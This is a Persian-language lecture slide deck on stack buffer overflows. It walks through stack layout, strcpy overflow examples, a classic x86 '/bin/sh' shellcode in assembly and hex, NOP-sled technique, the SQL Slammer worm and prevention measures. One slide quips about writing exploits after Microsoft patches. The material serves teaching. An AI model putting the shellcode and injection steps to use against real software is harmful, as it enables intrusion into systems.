290 likes | 435 Views
Buffer OverFlow استفاده از خطاهای برنامه نویس و نفوذ به قسمتهایی از حافظه که در حالت عادی اجازه دسترسی به آنها برای اجرا کننده برنامه وجود ندارد!. Buffer Overflows. نگاه کلی به پدید سریزی بافر یک مثال واقعی SQL Slammer - مکانیزم های کشف و پیشگیری. نگاه کلی.
E N D
Buffer OverFlowاستفاده از خطاهای برنامه نویس و نفوذ به قسمتهایی از حافظه که در حالت عادی اجازه دسترسی به آنها برای اجرا کننده برنامه وجود ندارد!
Buffer Overflows • نگاه کلی به پدید سریزیبافر • یک مثال واقعی • SQL Slammer - • مکانیزم های کشف و پیشگیری
نگاه کلی • آیا روی همه پشته ها میتوان این کار را کرد؟ • آیا از این روش برای بازنویسی آدرس بازگشت (انتقال کنترل برنامه در لحظه بازگشت ) یا آدرس محل یک تابع ( انتقال کنترل برنامه وقتی یک تابع صدا زده میشود ) میتوان استفاده کرد “Smashing the Stack” (سرریزی بافر برای پشته و بازنویسی محل آدرس بازگشت) آسانترین و معمول ترین آسیب پذیری برای شکستن میباشد!!!
آیا واقعا مساله Buffer Overflow مساله مهمی است؟ • درصد زیادی از آمارهای امنیتی CERT به این مساله اختصاص دارد. • با این اشتباه، یک قسمت از جبهه خودی را در اختیار دشمن قرار داده اید. در واقع دشمن آنچه میخواسته را در اختیار دارد : ”اجرای کد خود در برنامه شما!!!“
آیا واقعا مساله Buffer Overflow مساله مهمی است؟
آیا واقعا مساله Buffer Overflow مساله مهمی است؟ آمار CERT درباره overflow
Stack Lower Memory Addresses Heap Data Executable Code ساختمان پشته • Stack به طرف پایین رشد میکند (Intel, Motorola, SPARC, MIPS) • اشاره گر پشته به آخرین محل اشاره میکند
یک مثال اجاز بدهید ساختمان پشته را برای این برنامه بررسی کنیم void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; } int main(){ function(1,2,3); }
Function Parameters Return Address Saved Frame Pointer Local Variables ساختمان پشته pushl $3 pushl $2 pushl $1 call function function prolog pushl %ebp movl %esp, %ebp subl $20, %esp Higher Memory Addresses Allocates space for local variables
12 8 4 4 4 4 4 Top of memory Bottom of stack Bottom of memory Top of stack buffer2 buffer1 sfp ret a b c نگاه خطی به پشته
مثال دوم Buffer overflow از چک نکردن محدوده توسط برنامه ها استفاده میکند void function(char *str){ char buffer[16]; strcpy(buffer, str); } int main(){ char large_string[256]; int i; for (i = 0; i < 255; i++){ large_string[i] = ‘A’; } function(large_string); }
A A A A A A A A A A A A A A A A A A A A A A A A A A A A مثال دوم نتیجه اجرای این برنامه در پشته به صورت زیر است: 16 4 4 4 Top of memory Bottom of stack Bottom of memory Top of stack A A A A A A A A A A A A A A A A A A A buffer sfp ret *str آدرس بازگشت بوسیله کد : ‘AAAA’ (0x41414141) باز نویسی میشود! برنامه از تابع خارج شده و کدهای نوشته شده در آدرس 0x41414141….. را اجرا میکند
مثال سوم آیا ما میتوانیم، به جای crash برنامه، از این ویژگی برای اجرای کد خود استفاده کنیم؟ void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; int *r; r = buffer1 + 12; (*r) += 8; } int main(){ int x = 0; function(1,2,3); x = 1; printf(“%d\n”, x); }
4 12 8 4 4 4 4 4 Top of memory Bottom of stack Bottom of memory Top of stack r buffer2 buffer1 sfp ret a b c مثال سوم buffer1 + 12 +8 این برنامه باعث میشود که انتصاب 1 به x در نظر گرفته نشود، و مقدار 0 برای x چاپ بشود.
خوب !!! • در این جا دیدید که چگونه میتوانیم بر روی آدرس بازگشت یک تابع چیزی بنویسیم و تابع را به جایی که خودمان میخواهیم هدایت کنیم! • اما این موضوع چگونه میتواند به یک دشمن کمک کند تا به برنامه ما نفوذ کند؟
ایجاد کد مورد نظربرای باز کردن shell اولین قدم ایجاد یک کد مخرب است! jmp 0x1F popl %esi movl %esi, 0x8(%esi) xorl %eax, %eax movb %eax, 0x7(%esi) movl %eax, 0xC(%esi) movb $0xB, %al movl %esi, %ebx leal 0x8(%esi), %ecx leal 0xC(%esi), %edx int $0x80 xorl %ebx, %ebx movl %ebx, %eax inc %eax int $0x80 call -0x24 .string “/bin/sh” char shellcode[] = “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89” “\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff” “\xff\xff/bin/sh”; باید کد نهایی ایجاد کرد که برای ماشین قابل اجرا باشد
کد مخرب را برای اجرا به برنامه بدهید Top of memory Bottom of stack Bottom of memory Top of stack S S S S S S S S S S S S S S S S S S S S S S S S S S buffer sfp ret بافر را بواسطه کدهای بیهوده پر کنید و در ادامه کد اجرای shell را وارده کنید. آدرس باید دقیق باشد وگرنه برنامه crash میکند، این قسمت سخت ترین قسمت کار است.
کد مخرب را برای اجرا به برنامه بدهید Top of memory Bottom of stack Bottom of memory Top of stack N N N N N N S S S S S S S S S S S S S S S S S S S S buffer sfp ret شما میتوانید با استفاده از دستورالعمل NOP (0x90) شانس موفقیت خود را بالاتر ببرید این دستور العمل در واقع یک دستورالعمل اجرایی بیهوده است، که تا زمانی که به یک دستور العمل واقعی نرسیده اجرا میشود.
چگونه آسیب پذیری برنامه ها را پیدا کنیم UNIX - search through source code for vulnerable library calls (strcpy, gets, etc.) and buffer operations that don’t check bounds. (grep is your friend) Windows - wait for Microsoft to release a patch. Then you have about 6 - 8 months to write your exploit…
Buffer Overflows • نگاه کلی به پدید سریزیبافر • یک مثال واقعی- SQL Slammer • مکانیزم های کشف و پیشگیری
کرم Slammer • اولین مثال از یک کرم سریع ( تا پیش از این، این سرعت انتشار فقط در تئوری بود ) • در عرض 30 دقیقه، 75000 هاست آلوده شد • 90% از این هاست ها در عرض 10 دقیقه اول انتشار آلوده شدند • آسیب پذیری در MS SQL Server، بود!
کرم Slammer • کد به صورت تصادفی یک آدرس IP تولید میکرد و یک کپی از خود را به آن ارسال میکرد • از UDP استفاده میکرد • اندازه packet های این کرم فقط 375 بایت ... • انتشار این کرم هر 8.5 ثانیه دوبرابر میشد • در حالتی که از بیشترین سرعت scan (55 میلیون scans/second ) استفاده شود، در عرض 3 دقیقه کرم پیدا خواهد شد.
محل نفوذ در SQL Server • اگر بسته های UDP به پورت 1434 برسند و اولین بایت آنها 0x04 باشد، باقیمانده بسته به عنوان یک کلید رجیستری که باید باز شود (در واقع سعی میکند این کلید را باز کند ) تفسیر میشود. • اسم کلید رجیستری (که در ادامه بسته آمده) در buffer ذخیره میشود تا بتوان بعد از آن استفاده کرد. • محدوده آرایه چک نمیشود، بنابراین اگر طول رشته زیاد باشد، buffer overflow اتفاق می افتد و ...
کرم Slammer • وضع بدتر از این هم میتوانست باشد • Slammer کرم مهربانی بود! چرا که این کرم میتوانست با یک حمله DOS گسترده تمام network را از کار بیاندازد، ولی این کار را نکرد. • مشکلی که در تولید کننده اعداد تصادفی وجود داشت باعث شد که کرم Slammer با سرعت کمتری انتشار پیدا کند (دو بیت آخر اولین آدرس هرگز تغییر نمیکرد)
Buffer Overflows • نگاه کلی به پدید سریزیبافر • یک مثال واقعی • SQL Slammer - • مکانیزم های کشف و پیشگیری
معیار های جلوگیری از Overflow • بازرسی تمام کدها کار سخت و وقت گیری است و بسیاری از نقاط آسیب پذیری پیدا نمیشوند! (Windows حدود 5 میلیون خط کد دارد که میتوانند نقاط آسیب پذیری جدیدی را ایجاد کنند!!!؟) • تعداد زیادی ابزار آنالیز کد وجود دارد که از الگوریتم های اثبات شده برای کشف استفاده میکنند، تعداد زیادی از نقاط آسیب پذیر را پیدا میکنند، ولی نه همه آنها را! • پشته را به صورت غیر اجرایی در بیاورید (البته جلوی همه حمله ها را نمیگیرد)
پایان • پیدا کردن overflow کار سختی است • خوب؟ • باید صبر کنیم تا MS تمام باگ هاش را کشف کند؟ • یا باید منتظر بمانیم تا Slammer دیگری بیاید؟ • کاری هست که بتوان کرد؟؟؟